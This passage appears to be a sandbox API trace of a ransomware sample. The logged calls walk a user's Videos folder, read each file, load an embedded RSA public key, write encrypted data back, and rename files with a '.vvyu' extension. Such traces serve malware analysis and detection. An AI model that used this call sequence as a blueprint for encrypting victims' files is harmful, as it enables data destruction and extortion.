(HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0196.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea260 | out: hHeap=0x2c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.346] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa021, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa021, lpOverlapped=0x0) returned 1 [0196.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.348] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa026, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.348] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.349] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.350] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.350] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.350] CloseHandle (hObject=0x584) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0196.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0196.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b860 | out: hHeap=0x2c0000) returned 1 [0196.352] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\HkpWIkK5Da3UaMj2.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\hkpwikk5da3uamj2.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\HkpWIkK5Da3UaMj2.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\hkpwikk5da3uamj2.mkv.vvyu")) returned 1 [0196.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.354] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.356] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2146aa40, ftCreationTime.dwHighDateTime=0x1d89f57, ftLastAccessTime.dwLowDateTime=0xb1fc1b80, ftLastAccessTime.dwHighDateTime=0x1d8a3bf, ftLastWriteTime.dwLowDateTime=0xb1fc1b80, ftLastWriteTime.dwHighDateTime=0x1d8a3bf, nFileSizeHigh=0x0, nFileSizeLow=0x9b32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jf9T9.mp4", cAlternateFileName="")) returned 1 [0196.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0196.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.357] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\Jf9T9.mp4") returned=".mp4" [0196.357] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\Jf9T9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\jf9t9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.358] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=39730) returned 1 [0196.358] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.361] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9b0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.361] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.363] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.363] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9b32, lpOverlapped=0x0) returned 1 [0196.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.364] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.365] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.365] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.365] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.365] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.365] GetLastError () returned 0x0 [0196.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.365] GetLastError () returned 0x0 [0196.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.366] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.366] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.366] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.366] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.366] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9b30) returned 0x2af5168 [0196.367] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea260 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea2a8 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.368] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae65f0 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.371] GetCurrentThreadId () returned 0x5d8 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8d18 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.372] GetCurrentThreadId () returned 0x5d8 [0196.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0196.373] RtlAllocateHeap 